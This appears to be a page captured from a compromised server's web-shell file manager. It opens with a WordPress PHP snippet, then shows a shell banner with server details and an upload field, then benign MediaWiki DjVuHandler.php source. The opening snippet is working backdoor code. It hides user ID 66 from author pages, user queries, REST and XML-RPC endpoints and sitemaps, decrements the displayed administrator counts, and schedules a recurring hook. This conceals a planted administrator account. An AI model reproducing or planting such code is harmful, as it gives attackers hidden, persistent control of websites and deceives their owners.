add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/wiki/includes/media/ |
Upload File : |
<?php
/**
* Handler for DjVu images.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
* http://www.gnu.org/copyleft/gpl.html
*
* @file
* @ingroup Media
*/
use MediaWiki\FileRepo\File\File;
use MediaWiki\MainConfigNames;
use MediaWiki\MediaWikiServices;
use MediaWiki\PoolCounter\PoolCounterWorkViaCallback;
use MediaWiki\Shell\Shell;
/**
* Handler for DjVu images
*
* @ingroup Media
*/
class DjVuHandler extends ImageHandler {
private const EXPENSIVE_SIZE_LIMIT = 10_485_760; // 10MiB
// Constants for getHandlerState
private const STATE_DJVU_IMAGE = 'djvuImage';
private const STATE_TEXT_TREE = 'djvuTextTree';
private const STATE_META_TREE = 'djvuMetaTree';
private const CACHE_VERSION = 'v2';
/**
* @return bool
*/
public function isEnabled() {
$djvuRenderer = MediaWikiServices::getInstance()->getMainConfig()->get( MainConfigNames::DjvuRenderer );
$djvuDump = MediaWikiServices::getInstance()->getMainConfig()->get( MainConfigNames::DjvuDump );
if ( !$djvuRenderer || !$djvuDump ) {
wfDebug( "DjVu is disabled, please set \$wgDjvuRenderer and \$wgDjvuDump" );
return false;
}
return true;
}
/**
* @param File $file
* @return bool
*/
public function mustRender( $file ) {
return true;
}
/**
* True if creating thumbnails from the file is large or otherwise resource-intensive.
* @param File $file
* @return bool
*/
public function isExpensiveToThumbnail( $file ) {
return $file->getSize() > static::EXPENSIVE_SIZE_LIMIT;
}
/**
* @param File $file
* @return bool
*/
public function isMultiPage( $file ) {
return true;
}
/**
* @return array
*/
public function getParamMap() {
return [
'img_width' => 'width',
'img_page' => 'page',
];
}
/**
* @param string $name
* @param mixed $value
* @return bool
*/
public function validateParam( $name, $value ) {
if ( $name === 'page' && trim( $value ) !== (string)intval( $value ) ) {
// Extra junk on the end of page, probably actually a caption
// e.g. [[File:Foo.djvu|thumb|Page 3 of the document shows foo]]
return false;
}
return in_array( $name, [ 'width', 'height', 'page' ] ) && $value > 0;
}
/**
* @param array $params
* @return string|false
*/
public function makeParamString( $params ) {
$page = $params['page'] ?? 1;
if ( !isset( $params['width'] ) ) {
return false;
}
return "page{$page}-{$params['width']}px";
}
/**
* @param string $str
* @return array|false
*/
public function parseParamString( $str ) {
$m = false;
if ( preg_match( '/^page(\d+)-(\d+)px$/', $str, $m ) ) {
return [ 'width' => $m[2], 'page' => $m[1] ];
}
return false;
}
/**
* @param array $params
* @return array
*/
protected function getScriptParams( $params ) {
return [
'width' => $params['width'],
'page' => $params['page'],
];
}
/**
* @param File $image
* @param string $dstPath
* @param string $dstUrl
* @param array $params
* @param int $flags
* @return MediaTransformError|ThumbnailImage|TransformParameterError
*/
public function doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) {
$djvuRenderer = MediaWikiServices::getInstance()->getMainConfig()->get( MainConfigNames::DjvuRenderer );
$djvuPostProcessor = MediaWikiServices::getInstance()->getMainConfig()
->get( MainConfigNames::DjvuPostProcessor );
if ( !$this->normaliseParams( $image, $params ) ) {
return new TransformParameterError( $params );
}
$width = $params['width'];
$height = $params['height'];
$page = $params['page'];
if ( $flags & self::TRANSFORM_LATER ) {
$params = [
'width' => $width,
'height' => $height,
'page' => $page
];
return new ThumbnailImage( $image, $dstUrl, $dstPath, $params );
}
if ( !wfMkdirParents( dirname( $dstPath ), null, __METHOD__ ) ) {
return new MediaTransformError(
'thumbnail_error',
$width,
$height,
wfMessage( 'thumbnail_dest_directory' )
);
}
// Get local copy source for shell scripts
// Thumbnail extraction is very inefficient for large files.
// Provide a way to pool count limit the number of downloaders.
if ( $image->getSize() >= 1e7 ) { // 10 MB
$work = new PoolCounterWorkViaCallback( 'GetLocalFileCopy', sha1( $image->getName() ),
[
'doWork' => static function () use ( $image ) {
return $image->getLocalRefPath();
}
]
);
$srcPath = $work->execute();
} else {
$srcPath = $image->getLocalRefPath();
}
if ( $srcPath === false ) { // Failed to get local copy
wfDebugLog( 'thumbnail',
sprintf( 'Thumbnail failed on %s: could not get local copy of "%s"',
wfHostname(), $image->getName() ) );
return new MediaTransformError( 'thumbnail_error',
$params['width'], $params['height'],
wfMessage( 'filemissing' )
);
}
# Use a subshell (brackets) to aggregate stderr from both pipeline commands
# before redirecting it to the overall stdout. This works in both Linux and Windows XP.
$cmd = '(' . Shell::escape(
$djvuRenderer,
"-format=ppm",
"-page={$page}",
"-size={$params['physicalWidth']}x{$params['physicalHeight']}",
$srcPath );
if ( $djvuPostProcessor ) {
$cmd .= " | {$djvuPostProcessor}";
}
$cmd .= ' > ' . Shell::escape( $dstPath ) . ') 2>&1';
wfDebug( __METHOD__ . ": $cmd" );
$retval = 0;
$err = wfShellExec( $cmd, $retval );
$removed = $this->removeBadFile( $dstPath, $retval );
if ( $retval !== 0 || $removed ) {
$this->logErrorForExternalProcess( $retval, $err, $cmd );
return new MediaTransformError( 'thumbnail_error', $width, $height, $err );
}
$params = [
'width' => $width,
'height' => $height,
'page' => $page
];
return new ThumbnailImage( $image, $dstUrl, $dstPath, $params );
}
/**
* Cache an instance of DjVuImage in a MediaHandlerState object, return
* that instance
*
* @param MediaHandlerState $state
* @param string $path
* @return DjVuImage
*/
private function getDjVuImage( $state, $path ) {
$deja = $state->getHandlerState( self::STATE_DJVU_IMAGE );
if ( !$deja ) {
$deja = new DjVuImage( $path );
$state->setHandlerState( self::STATE_DJVU_IMAGE, $deja );
}
return $deja;
}
/**
* Get metadata, unserializing it if necessary.
*
* @param File $file The DjVu file in question
* @param bool $gettext
* @return string|false|array metadata
*/
private function getMetadataInternal( File $file, $gettext ) {
$itemNames = [ 'error', '_error', 'data' ];
if ( $gettext ) {
$itemNames[] = 'text';
}
$unser = $file->getMetadataItems( $itemNames );
if ( isset( $unser['error'] ) ) {
return false;
}
if ( isset( $unser['_error'] ) ) {
return false;
}
return $unser;
}
/**
* Cache a document tree for the DjVu metadata
* @param File $image
* @param bool $gettext DOCUMENT (Default: false)
* @return false|array
*/
public function getMetaTree( $image, $gettext = false ) {
if ( $gettext && $image->getHandlerState( self::STATE_TEXT_TREE ) ) {
return $image->getHandlerState( self::STATE_TEXT_TREE );
}
if ( !$gettext && $image->getHandlerState( self::STATE_META_TREE ) ) {
return $image->getHandlerState( self::STATE_META_TREE );
}
$metadata = $this->getMetadataInternal( $image, $gettext );
if ( !$metadata ) {
return false;
}
if ( !$gettext ) {
unset( $metadata['text'] );
}
return $metadata;
}
public function getThumbType( $ext, $mime, $params = null ) {
$djvuOutputExtension = MediaWikiServices::getInstance()->getMainConfig()
->get( MainConfigNames::DjvuOutputExtension );
static $djvuMime = null;
if ( $djvuMime === null ) {
$magic = MediaWikiServices::getInstance()->getMimeAnalyzer();
$djvuMime = $magic->getMimeTypeFromExtensionOrNull( $djvuOutputExtension );
}
return [ $djvuOutputExtension, $djvuMime ];
}
public function getSizeAndMetadata( $state, $path ) {
wfDebug( "Getting DjVu metadata for $path" );
$djvuImage = $this->getDjVuImage( $state, $path );
$metadata = $djvuImage->retrieveMetaData();
if ( $metadata === false ) {
// Special value so that we don't repetitively try and decode a broken file.
$metadata = [ 'error' => 'Error extracting metadata' ];
}
return [ 'metadata' => $metadata ] + $djvuImage->getImageSize();
}
public function getMetadataType( $image ) {
// historical reasons
return 'djvuxml';
}
public function isFileMetadataValid( $image ) {
return $image->getMetadataArray() ? self::METADATA_GOOD : self::METADATA_BAD;
}
public function pageCount( File $image ) {
$info = $this->getDimensionInfo( $image );
return $info ? $info['pageCount'] : false;
}
public function getPageDimensions( File $image, $page ) {
$index = $page - 1; // MW starts pages at 1
$info = $this->getDimensionInfo( $image );
if ( $info && isset( $info['dimensionsByPage'][$index] ) ) {
return $info['dimensionsByPage'][$index];
}
return false;
}
protected function getDimensionInfo( File $file ) {
$cache = MediaWikiServices::getInstance()->getMainWANObjectCache();
return $cache->getWithSetCallback(
$cache->makeKey( 'file-djvu', 'dimensions', self::CACHE_VERSION, $file->getSha1() ),
$cache::TTL_INDEFINITE,
function () use ( $file ) {
$tree = $this->getMetaTree( $file );
return $this->getDimensionInfoFromMetaTree( $tree );
},
[ 'pcTTL' => $cache::TTL_INDEFINITE ]
);
}
/**
* Given the metadata, returns dimension information about the document
* @param false|array $metatree The file's metadata tree
* @return array|false
*/
protected function getDimensionInfoFromMetaTree( $metatree ) {
if ( !$metatree ) {
return false;
}
$dimsByPage = [];
if ( !isset( $metatree['data'] ) || !$metatree['data'] ) {
return false;
}
foreach ( $metatree['data']['pages'] as $page ) {
if ( !$page ) {
$dimsByPage[] = false;
} else {
$dimsByPage[] = [
'width' => (int)$page['width'],
'height' => (int)$page['height'],
];
}
}
return [
'pageCount' => count( $metatree['data']['pages'] ),
'dimensionsByPage' => $dimsByPage
];
}
/**
* @param File $image
* @param int $page Page number to get information for
* @return string|false Page text or false when no text found.
*/
public function getPageText( File $image, $page ) {
$tree = $this->getMetaTree( $image, true );
if ( !$tree ) {
return false;
}
if ( isset( $tree['text'] ) && isset( $tree['text'][$page - 1] ) ) {
return $tree['text'][$page - 1];
}
return false;
}
public function useSplitMetadata() {
return true;
}
}